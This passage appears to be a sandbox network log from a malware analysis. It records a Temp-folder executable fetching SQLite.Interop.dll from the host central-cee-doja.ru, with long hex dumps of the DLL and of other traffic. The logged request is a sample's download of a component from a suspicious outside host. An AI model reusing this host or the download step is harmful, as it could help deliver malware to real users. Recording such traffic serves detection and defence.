2023-11-18 09:02:40 UTC	5604	IN	Data Raw: f6 44 24 59 04 74 3c 8b 54 24 48 85 d2 74 34 8b 4c 24 44 e8 d5 e8 ff ff 5f 5e 8b e5 5d c3 85 f6 74 15 89 44 24 54 2b c6 03 44 24 48 56 51 50 e8 c9 24 f0 ff 83 c4 0c 8b 4d 08 8d 54 24 44 e8 da c2 ff ff 5f 5e 8b e5 5d c3 20 30 11 10 55 2e 11 10 43 2f 11 10 87 2f 11 10 cb 2f 11 10 6d 2e 11 10 0b 30 11 10 12 2e 11 10 2a 2e 11 10 6f 2f 11 10 9f 2f 11 10 e1 2f 11 10 93 30 11 10 00 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 0c 02 0c 0c 03 0c 0c 0c 0c 0c 04 0c 0c 0c 05 0c 06 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 07 0c 08 0c 0c 0c 05 0c 0c 09 0c 0c 0c 0c 0c 0a 0c 0c 0c 0b cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec a4 00 00 00 a1 04 10 14 10 33 c4 89 84 24 a0 00 00 00 8b 45 10 8d 4c 24 04 8b Data Ascii: D$Yt<T$Ht4L$D_^]tD$T+D$HVQP$MT$D_^] 0U.C///m.0.*.o///0U3$EL$
2023-11-18 09:02:40 UTC	5716	IN	Data Raw: 39 01 00 00 66 0f 57 c0 83 c4 10 c3 66 0f 12 4c 24 08 66 0f c5 c1 03 25 00 80 00 00 83 f8 00 0f 84 18 01 00 00 66 0f 57 c0 83 c4 10 c3 f2 0f 58 e4 f2 0f 10 c4 ba ee 03 00 00 e9 6e 01 00 00 66 0f 12 14 24 66 0f 7e d0 66 0f 73 d2 20 66 0f 7e d2 81 e2 ff ff ff 7f 0b c2 b9 00 00 00 00 83 f8 00 0f 84 6b fe ff ff 66 0f 12 0d 98 d7 13 10 66 0f 12 05 d0 d7 13 10 f2 0f 59 c9 ba 1c 00 00 00 e9 28 01 00 00 66 0f 12 24 24 66 0f 12 54 24 08 66 0f 7e e0 83 f8 00 75 29 66 0f 73 d4 20 66 0f 7e e2 81 fa 00 00 f0 3f 0f 84 f3 00 00 00 81 fa 00 00 f0 bf 75 0c 66 0f 12 05 40 d7 13 10 83 c4 10 c3 66 0f 12 1d 30 d7 13 10 66 0f 57 c9 66 0f 54 da 66 0f 76 cb 66 0f d7 c1 25 ff 00 00 00 3d ff 00 00 00 75 63 66 0f c5 c2 03 66 0f 12 24 24 25 00 80 00 00 81 f1 00 00 f0 bf 0b d1 83 fa Data Ascii: 9fWfL$f%fWXnf$f~fs f~kffY(f$$fT$f~u)fs f~?uf@f0fWfTfvf%=ucff$$%
2023-11-18 09:02:40 UTC	5796	IN	Data Raw: bc 0a 47 ec 3f dc 61 6a 09 e8 69 39 3e 00 00 00 00 00 80 f3 3f 00 00 00 54 7c ac ec 3f 27 5c 1b f2 7c 23 3c 3e 00 00 00 00 00 00 f4 3f 00 00 00 24 e2 0e ed 3f ce 7d b2 64 6a 88 23 3e 00 00 00 00 00 80 f4 3f 00 00 00 cc 57 6e ed 3f d7 88 13 4d 56 78 3a 3e 00 00 00 00 00 00 f5 3f 00 00 00 2c f8 ca ed 3f 31 8d 19 38 6f 1a 2c 3e 00 00 00 00 00 80 f5 3f 00 00 00 44 dd 24 ee 3f 09 63 bd 2f ba 0a 19 3e 00 00 00 00 00 00 f6 3f 00 00 00 40 20 7c ee 3f 94 f5 78 37 7c a8 31 3e 00 00 00 00 00 80 f6 3f 00 00 00 7c d9 d0 ee 3f 1c d6 d9 1e 39 08 12 3e 00 00 00 00 00 00 f7 3f 00 00 00 70 20 23 ef 3f 8c 49 41 8d 8b 75 3d 3e 00 00 00 00 00 80 f7 3f 00 00 00 d0 0b 73 ef 3f 88 78 00 d9 b4 0f 34 3e 00 00 00 00 00 00 f8 3f 00 00 00 70 b1 c0 ef 3f 65 64 66 bf 26 c9 2e 3e 00 00 Data Ascii: G?aji9>?T\|?'\\|#<>?$?}dj#>?Wn?MVx:>?,?18o,>?D$?c/>?@ \|?x7\|1>?\|?9>?p #?IAu=>?s?x4>?p?edf&.>
2023-11-18 09:02:40 UTC	5876	IN	Data Raw: 20 25 58 e6 3c 00 61 06 1d 59 ac ba 3f 5d 40 ec ba 5f 7d 9c 3c 00 f6 6e 4c b3 ec ba 3f fb bc 9c 9a 47 09 bc 3c 00 ca 0c 31 0f 2d bb 3f 61 dc e9 7f a1 28 ef 3c 00 55 14 cf 6c 6d bb 3f 69 54 09 ed 3f 91 e0 3c 00 11 bb 2a cc ad bb 3f 56 e3 cf 2a d7 fa b6 3c 00 77 37 48 2d ee bb 3f ad 16 8d 58 5b 46 b4 3c 00 06 c1 2b 90 2e bc 3f 58 8e 20 15 6b 6e e0 3c 00 45 90 d9 f4 6e bc 3f db 54 a9 28 8d 2b e5 3c 00 c6 de 55 5b af bc 3f d6 89 1b d4 06 9c e4 3c 00 27 e7 a4 c3 ef bc 3f 6a 75 21 34 b8 95 a9 3c 00 16 e5 ca 2d 30 bd 3f d6 17 a8 f7 a2 ef e1 3c 00 51 15 cc 99 70 bd 3f 05 ba e5 86 bf 8a e2 3c 00 ae b5 ac 07 b1 bd 3f 87 02 b6 98 7b dc eb 3c 00 18 05 71 77 f1 bd 3f 5f 57 a8 e4 98 f0 c9 3c 00 96 43 1d e9 31 be 3f 27 90 02 c6 fa d3 01 3c 00 49 b2 b5 5c 72 be 3f d1 ed Data Ascii: %X<aY?]@_}<nL?G<1-?a(<Ulm?iT?<?V<w7H-?X[F<+.?X kn<En?T(+<U[?<'?ju!4<-0?<Qp?<?{<qw?_W<C1?'<I\r?
2023-11-18 09:02:40 UTC	5951	IN	Data Raw: 27 65 48 db 3f 60 1f 9e 09 4a b5 4a 3d 00 10 78 0e 7e d0 db 3f 20 cf 0d 1c c2 8a 26 3d 00 10 6e ba 60 59 dc 3f fe 81 cb 96 bd b4 43 3d 00 30 91 8b 16 e1 dc 3f e2 19 5d 05 a3 ad 2f 3d 00 10 23 20 99 67 dd 3f 04 75 e8 96 50 ed 18 3d 00 c0 ff 0d e2 ec dd 3f aa 8a ed 2c 6c e2 43 3d 00 f0 35 ad eb 71 de 3f e1 95 8e e0 09 16 01 3d 00 40 44 d3 b3 f6 de 3f fa 14 16 2d 5b b3 40 3d 00 70 74 9e 34 7a df 3f 20 91 d9 81 70 6e 4a 3d 00 c0 8c 9e 6c fd df 3f 9d 69 86 2e 45 67 fa 3c 00 f0 79 7e a9 3f e0 3f ee 8b 4f e7 12 5e 27 3d 00 28 54 8d 74 80 e0 3f db 0a ce 78 3b 8c 3b 3d 00 00 cf 50 16 c1 e0 3f a5 52 11 eb 52 17 46 3d 00 80 b1 26 08 01 e1 3f 58 d2 07 8a c9 a3 4e 3d 00 e8 4a dd cc 40 e1 3f c1 d2 7e 19 da ca 1f 3d 00 48 74 3d 63 80 e1 3f 41 7a e0 07 17 55 22 3d 00 98 Data Ascii: 'eH?`JJ=x~? &=n`Y?C=0?]/=# g?uP=?,lC=5q?=@D?-[@=pt4z? pnJ=l?i.Eg<y~??O^'=(Tt?x;;=P?RRF=&?XN=J@?~=Ht=c?AzU"=
2023-11-18 09:02:40 UTC	6063	IN	Data Raw: cd d9 ff d0 3f 80 9d f1 f6 0e 35 16 3d 00 78 c2 be 2f 40 d1 3f 8b ba 22 42 20 3c 31 3d 00 90 69 19 97 7a d1 3f 99 5c 2d 21 79 f2 21 3d 00 58 ac 30 7a b5 d1 3f 7e 84 ff 62 3e cf 3d 3d 00 b8 3a 15 db f0 d1 3f df 0e 0c 23 2e 58 27 3d 00 48 42 4f 0e 26 d2 3f f9 1f a4 28 10 7e 15 3d 00 78 11 a6 62 62 d2 3f 12 19 0c 2e 1a b0 12 3d 00 d8 43 c0 71 98 d2 3f 79 37 9e ac 69 39 2b 3d 00 80 0b 76 c1 d5 d2 3f bf 08 0f be de ea 3a 3d 00 30 bb a7 b3 0c d3 3f 32 d8 b6 19 99 92 38 3d 00 78 9f 50 13 44 d3 3f 58 b3 12 1f 31 ef 1f 3d 00 00 00 00 00 c0 db 3f 00 00 00 00 00 c0 db 3f 00 00 00 00 00 51 db 3f 00 00 00 00 00 51 db 3f 00 00 00 00 f0 e8 da 3f 00 00 00 00 f0 e8 da 3f 00 00 00 00 e0 80 da 3f 00 00 00 00 e0 80 da 3f 00 00 00 00 c0 1f da 3f 00 00 00 00 c0 1f da 3f 00 00 Data Ascii: ?5=x/@?"B <1=iz?\-!y!=X0z?~b>==:?#.X'=HBO&?(~=xbb?.=Cq?y7i9+=v?:=0?28=xPD?X1=??Q?Q???????
2023-11-18 09:02:40 UTC	6143	IN	Data Raw: 73 20 6f 6e 6c 79 20 61 6c 6c 6f 77 65 64 20 6f 6e 20 61 6e 20 49 4e 54 45 47 45 52 20 50 52 49 4d 41 52 59 20 4b 45 59 00 76 69 72 74 75 61 6c 20 74 61 62 6c 65 73 20 63 61 6e 6e 6f 74 20 75 73 65 20 63 6f 6d 70 75 74 65 64 20 63 6f 6c 75 6d 6e 73 00 00 76 69 72 74 75 61 6c 00 73 74 6f 72 65 64 00 00 65 72 72 6f 72 20 69 6e 20 67 65 6e 65 72 61 74 65 64 20 63 6f 6c 75 6d 6e 20 22 25 73 22 00 00 2c 00 00 00 0a 20 20 00 2c 0a 20 20 00 00 00 00 0a 29 00 00 43 52 45 41 54 45 20 54 41 42 4c 45 20 00 00 00 20 54 45 58 54 00 00 00 20 4e 55 4d 00 00 00 00 20 49 4e 54 00 00 00 00 20 52 45 41 4c 00 00 00 75 6e 6b 6e 6f 77 6e 20 64 61 74 61 74 79 70 65 20 66 6f 72 20 25 73 2e 25 73 3a 20 22 25 73 22 00 00 00 00 6d 69 73 73 69 6e 67 20 64 61 74 61 74 79 70 65 20 66 Data Ascii: s only allowed on an INTEGER PRIMARY KEYvirtual tables cannot use computed columnsvirtualstorederror in generated column "%s", , )CREATE TABLE TEXT NUM INT REALunknown datatype for %s.%s: "%s"missing datatype f
2023-11-18 09:02:40 UTC	6167	IN	Data Raw: 73 65 67 64 69 72 27 20 57 48 45 52 45 20 6c 65 76 65 6c 20 42 45 54 57 45 45 4e 20 3f 20 41 4e 44 20 3f 00 00 53 45 4c 45 43 54 20 3f 20 55 4e 49 4f 4e 20 53 45 4c 45 43 54 20 6c 65 76 65 6c 20 2f 20 28 31 30 32 34 20 2a 20 3f 29 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 00 00 00 00 53 45 4c 45 43 54 20 6c 65 76 65 6c 2c 20 63 6f 75 6e 74 28 2a 29 20 41 53 20 63 6e 74 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 20 20 20 47 52 4f 55 50 20 42 59 20 6c 65 76 65 6c 20 48 41 56 49 4e 47 20 63 6e 74 3e 3d 3f 20 20 4f 52 44 45 52 20 42 59 20 28 6c 65 76 65 6c 20 25 25 20 31 30 32 34 29 20 41 53 43 2c 20 32 20 44 45 53 43 20 4c 49 4d 49 54 20 31 00 00 53 45 4c 45 43 54 20 32 20 2a 20 74 6f 74 61 6c 28 31 20 2b 20 6c 65 61 76 65 Data Ascii: segdir' WHERE level BETWEEN ? AND ?SELECT ? UNION SELECT level / (1024 * ?) FROM %Q.'%q_segdir'SELECT level, count() AS cnt FROM %Q.'%q_segdir' GROUP BY level HAVING cnt>=? ORDER BY (level %% 1024) ASC, 2 DESC LIMIT 1SELECT 2 total(1 + leave
2023-11-18 09:02:40 UTC	6247	IN	Data Raw: 00 da 03 39 03 1a 05 d9 00 5a 02 fa 04 7a 01 8f 07 da 09 cf 02 fa 16 39 00 3a 01 39 00 da 06 19 01 fa 0d 39 00 1a 12 fa 0c 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 cf 03 9a 05 b9 00 36 00 32 00 f9 03 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 19 02 1a 20 79 10 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 36 00 32 00 f9 07 36 00 32 00 36 00 32 00 19 04 36 00 32 00 59 20 1a 06 b9 02 5a 00 d9 00 5a 01 e9 05 e5 05 7e 00 49 00 45 00 fe 00 69 00 25 00 5e 00 25 00 5e 00 a5 00 46 00 69 00 25 00 5e 0c 25 00 da 00 9e 00 6c 00 5e 00 95 00 2f 00 55 00 c5 04 25 00 25 00 07 07 26 00 35 00 2c 00 e7 02 e7 00 e7 00 e7 00 e7 00 e7 00 e7 00 Data Ascii: 9Zz9:9962626262626262626262626262 y6262626262626262626262626262Y ZZ~IEi%^%^Fi%^%l^/U%%&5,
2023-11-18 09:02:40 UTC	6263	IN	Data Raw: 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 01 00 00 01 01 00 00 01 00 01 00 01 01 00 01 00 00 01 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
2023-11-18 09:02:40 UTC	6279	IN	Data Raw: 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 3e 01 00 00 02 00 01 00 62 00 00 00 00 00 00 00 01 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 00 00 00 00 01 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 00 00 00 00 00 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 00 00 00 00 0a 0a 09 09 08 08 07 07 07 06 06 06 05 05 05 04 04 04 04 03 03 03 03 03 03 02 02 02 02 02 02 02 10 10 02 10 01 08 20 00 00 00 00 00 00 00 00 00 a0 c7 12 10 a8 c7 12 10 b0 c7 12 10 63 63 63 63 7c 7c 7c 7c 77 77 77 77 7b 7b 7b 7b f2 f2 Data Ascii: >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>b0123456789abcdef cccc\|\|\|\|wwww{{{{
2023-11-18 09:02:40 UTC	6295	IN	Data Raw: 38 39 62 37 35 34 61 63 63 64 37 63 64 64 66 00 5f 53 49 39 62 66 34 36 31 64 62 39 62 66 38 33 63 32 32 40 38 00 53 49 39 63 36 64 37 63 64 37 62 37 64 33 38 30 35 35 00 53 49 39 63 62 37 36 39 32 66 36 31 39 39 38 34 38 35 00 5f 53 49 39 65 61 34 39 32 37 36 64 63 66 39 38 34 39 66 40 31 32 00 53 49 61 30 36 39 64 61 37 36 39 36 38 62 37 35 35 33 00 53 49 61 30 66 39 64 64 31 31 35 38 63 62 66 62 30 63 00 5f 53 49 61 31 64 37 65 32 31 61 35 34 38 62 39 31 30 63 40 34 00 53 49 61 32 36 62 38 65 35 31 31 36 62 37 64 39 33 62 00 53 49 61 32 61 36 30 35 30 61 38 64 62 64 33 62 37 61 00 53 49 61 33 34 30 31 65 39 38 63 62 61 64 36 37 33 65 00 53 49 61 33 66 37 62 33 31 31 39 30 63 65 30 38 31 35 00 53 49 61 36 31 38 65 37 66 31 65 39 35 62 35 63 33 32 00 53 Data Ascii: 89b754accd7cddf_SI9bf461db9bf83c22@8SI9c6d7cd7b7d38055SI9cb7692f61998485_SI9ea49276dcf9849f@12SIa069da76968b7553SIa0f9dd1158cbfb0c_SIa1d7e21a548b910c@4SIa26b8e5116b7d93bSIa2a6050a8dbd3b7aSIa3401e98cbad673eSIa3f7b31190ce0815SIa618e7f1e95b5c32S
2023-11-18 09:02:40 UTC	6311	IN	Data Raw: 00 ae 01 00 00 e4 04 00 00 00 00 00 00 44 06 34 00 00 00 56 00 53 00 5f 00 56 00 45 00 52 00 53 00 49 00 4f 00 4e 00 5f 00 49 00 4e 00 46 00 4f 00 00 00 00 00 bd 04 ef fe 00 00 01 00 00 00 01 00 05 00 73 00 00 00 01 00 05 00 73 00 3f 00 00 00 00 00 00 00 04 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a2 05 00 00 01 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 00 00 7e 05 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00 5a 00 1d 00 01 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 4e 00 61 00 6d 00 65 00 00 00 00 00 48 00 69 00 70 00 70 00 2c 00 20 00 57 00 79 00 72 00 69 00 63 00 6b 00 20 00 26 00 20 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 2c 00 20 00 49 00 6e 00 63 00 2e 00 00 00 Data Ascii: D4VS_VERSION_INFOss?StringFileInfo~040904b0ZCompanyNameHipp, Wyrick & Company, Inc.
2023-11-18 09:02:40 UTC	6327	IN	Data Raw: 35 15 35 23 35 29 35 32 35 39 35 3e 35 50 35 c7 37 cf 37 da 37 e4 37 ea 37 f3 37 fa 37 ff 37 0d 38 24 38 7d 38 ba 38 c9 38 d2 38 92 39 9a 39 a8 39 b6 39 c0 39 c6 39 cf 39 d6 39 db 39 e9 39 f2 39 f7 39 04 3a 12 3a 1c 3a 22 3a 2b 3a 32 3a 37 3a 45 3a 4e 3a 53 3a 64 3a 72 3a 7c 3a 82 3a 8b 3a 92 3a 97 3a a5 3a ae 3a b3 3a c4 3a d2 3a dc 3a e2 3a eb 3a f2 3a f7 3a 05 3b 0e 3b 13 3b 28 3b 36 3b 40 3b 46 3b 4f 3b 56 3b 5b 3b 6d 3b 7c 3b 8b 3b 90 3b b2 3b c0 3b ca 3b d0 3b d9 3b e0 3b e5 3b f3 3b fc 3b 01 3c 0e 3c 1c 3c 26 3c 2c 3c 35 3c 3c 3c 41 3c 4f 3c 58 3c d8 3c dc 3c e0 3c e4 3c e8 3c ec 3c f0 3c f4 3c 1b 3d 66 3d d5 3d df 3d e4 3d 17 3e 49 3e 0f 3f 19 3f 1e 3f 58 3f df 3f 00 00 00 30 07 00 28 01 00 00 9d 32 b2 32 d3 32 f9 32 12 33 1a 33 25 33 2f 33 35 33 Data Ascii: 55#5)52595>5P5777777778$8}8888999999999999:::":+:2:7:E:N:S:d:r:\|:::::::::::::::;;;(;6;@;F;O;V;[;m;\|;;;;;;;;;;;;<<<&<,<5<<<A<O<X<<<<<<<<<=f====>I>???X??0(222233%3/353
2023-11-18 09:02:40 UTC	6343	IN	Data Raw: 30 74 30 7c 30 84 30 8c 30 94 30 9c 30 a4 30 ac 30 b4 30 bc 30 c4 30 cc 30 d4 30 dc 30 e4 30 ec 30 f4 30 fc 30 04 31 0c 31 14 31 1c 31 24 31 2c 31 34 31 3c 31 44 31 4c 31 54 31 5c 31 64 31 6c 31 74 31 7c 31 84 31 8c 31 94 31 9c 31 a4 31 ac 31 b4 31 bc 31 c4 31 cc 31 d4 31 dc 31 e4 31 ec 31 f4 31 fc 31 04 32 0c 32 14 32 1c 32 24 32 2c 32 34 32 3c 32 44 32 4c 32 54 32 5c 32 64 32 6c 32 74 32 7c 32 84 32 8c 32 94 32 9c 32 a4 32 ac 32 b4 32 bc 32 c4 32 cc 32 d4 32 dc 32 e4 32 ec 32 f4 32 fc 32 04 33 0c 33 14 33 1c 33 24 33 2c 33 34 33 3c 33 44 33 4c 33 54 33 5c 33 64 33 6c 33 74 33 7c 33 84 33 8c 33 94 33 9c 33 a4 33 ac 33 b4 33 bc 33 c4 33 cc 33 d4 33 dc 33 e4 33 ec 33 f4 33 fc 33 04 34 0c 34 14 34 1c 34 24 34 2c 34 34 34 3c 34 44 34 4c 34 54 34 5c 34 64 34 Data Ascii: 0t0\|000000000000000001111$1,141<1D1L1T1\1d1l1t1\|111111111111111112222$2,242<2D2L2T2\2d2l2t2\|222222222222222223333$3,343<3D3L3T3\3d3l3t3\|333333333333333334444$4,444<4D4L4T4\4d4
2023-11-18 09:02:40 UTC	6359	IN	Data Raw: 2f 44 69 67 69 43 65 72 74 54 72 75 73 74 65 64 47 34 43 6f 64 65 53 69 67 6e 69 6e 67 52 53 41 34 30 39 36 53 48 41 33 38 34 32 30 32 31 43 41 31 2e 63 72 6c 30 3d 06 03 55 1d 20 04 36 30 34 30 32 06 05 67 81 0c 01 03 30 29 30 27 06 08 2b 06 01 05 05 07 02 01 16 1b 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 43 50 53 30 81 94 06 08 2b 06 01 05 05 07 01 01 04 81 87 30 81 84 30 24 06 08 2b 06 01 05 05 07 30 01 86 18 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 30 5c 06 08 2b 06 01 05 05 07 30 02 86 50 68 74 74 70 3a 2f 2f 63 61 63 65 72 74 73 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 44 69 67 69 43 65 72 74 54 72 75 73 74 65 64 47 34 43 6f 64 65 53 69 67 6e 69 6e 67 52 53 41 34 30 39 36 53 48 41 33 38 Data Ascii: /DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=U 60402g0)0'+http://www.digicert.com/CPS0+00$+0http://ocsp.digicert.com0\+0Phttp://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA38

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49749	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:38 UTC	793	OUT	GET /dlls/x86/SQLite.Interop.dll HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:38 UTC	797	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:38 GMT Content-Type: application/x-msdos-program Content-Length: 1374512 Connection: close Last-Modified: Tue, 02 Nov 2021 17:47:02 GMT ETag: "14f930-5cfd1e1811180" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yskcQRyegIRP%2BQnU9wdGdsQZcgle%2FD4HOI6F2OkDQX9HNYDHc1C7ZKulM07XMNLvDoyimgPgsG6%2B2WRh9ng%2BXnKk5aMeELbKhemUbb5n68QHyd2X1uMKhsXwWMdrI0diqLCcEM%2Bj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09230855ec4c-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:38 UTC	798	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a b2 68 a3 de d3 06 f0 de d3 06 f0 de d3 06 f0 6a 4f f7 f0 ef d3 06 f0 6a 4f f5 f0 5e d3 06 f0 6a 4f f4 f0 f9 d3 06 f0 e5 8d 05 f1 c9 d3 06 f0 e5 8d 03 f1 c8 d3 06 f0 e5 8d 02 f1 d1 d3 06 f0 03 2c cd f0 d6 d3 06 f0 c0 81 95 f0 dd d3 06 f0 de d3 07 f0 46 d3 06 f0 49 8d 0e f1 df d3 06 f0 49 8d 06 f1 df d3 06 f0 4c 8d f9 f0 df d3 06 f0 49 8d 04 f1 df d3 06 f0 52 69 63 68 de d3 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hjOjO^jO,FIILIRich
2023-11-18 09:02:38 UTC	798	IN	Data Raw: 72 63 00 00 00 94 08 00 00 00 60 14 00 00 0a 00 00 00 24 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 89 00 00 00 70 14 00 00 8a 00 00 00 2e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: rc`$@@.relochp.@B
2023-11-18 09:02:38 UTC	800	IN	Data Raw: 10 00 0f 95 c0 0f b6 c0 50 e8 17 01 00 00 59 5d c2 0c 00 6a 10 68 70 dd 13 10 e8 65 08 00 00 6a 00 e8 06 04 00 00 59 84 c0 75 07 33 c0 e9 e0 00 00 00 e8 f8 02 00 00 88 45 e3 b3 01 88 5d e7 83 65 fc 00 83 3d 30 3a 14 10 00 74 07 6a 07 e8 ab 06 00 00 c7 05 30 3a 14 10 01 00 00 00 e8 2d 03 00 00 84 c0 74 65 e8 b6 07 00 00 68 58 1c 00 10 e8 91 05 00 00 e8 43 06 00 00 c7 04 24 d5 1a 00 10 e8 80 05 00 00 e8 50 06 00 00 c7 04 24 60 82 11 10 68 4c 82 11 10 e8 e8 56 00 00 59 59 85 c0 75 29 e8 bd 02 00 00 84 c0 74 20 68 48 82 11 10 68 44 82 11 10 e8 6e 56 00 00 59 59 c7 05 30 3a 14 10 02 00 00 00 32 db 88 5d e7 c7 45 fc fe ff ff ff e8 44 00 00 00 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 3e 00 74 1e 56 e8 0b 04 00 00 59 84 c0 74 13 ff 75 0c 6a 02 ff 75 08 8b Data Ascii: PY]jhpejYu3E]e=0:tj0:-tehXC$P$`hLVYYu)t hHhDnVYY0:2]EDL>tVYtuju
2023-11-18 09:02:38 UTC	801	IN	Data Raw: fe ff ff ff b0 01 eb 1f 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 32 c0 e8 45 03 00 00 c3 55 8b ec e8 ef 04 00 00 85 c0 74 0f 80 7d 08 00 75 09 33 c0 b9 34 3a 14 10 87 01 5d c3 55 8b ec 80 3d 50 3a 14 10 00 74 06 80 7d 0c 00 75 12 ff 75 08 e8 cb 60 00 00 ff 75 08 e8 74 0d 00 00 59 59 b0 01 5d c3 55 8b ec a1 04 10 14 10 8b c8 33 05 38 3a 14 10 83 e1 1f ff 75 08 d3 c8 83 f8 ff 75 07 e8 ee 5e 00 00 eb 0b 68 38 3a 14 10 e8 52 5f 00 00 59 f7 d8 59 1b c0 f7 d0 23 45 08 5d c3 55 8b ec ff 75 08 e8 ba ff ff ff f7 d8 59 1b c0 f7 d8 48 5d c3 55 8b ec 83 ec 14 83 65 f4 00 83 65 f8 00 a1 04 10 14 10 56 57 bf 4e e6 40 bb be 00 00 ff ff 3b c7 74 0d 85 c6 74 09 f7 d0 a3 00 10 14 10 eb 66 8d 45 f4 50 ff 15 28 81 11 10 8b 45 f8 Data Ascii: E38eE2EUt}u34:]U=P:t}uu`utYY]U38:uu^h8:R_YY#E]UuYH]UeeVWN@;ttfEP(E
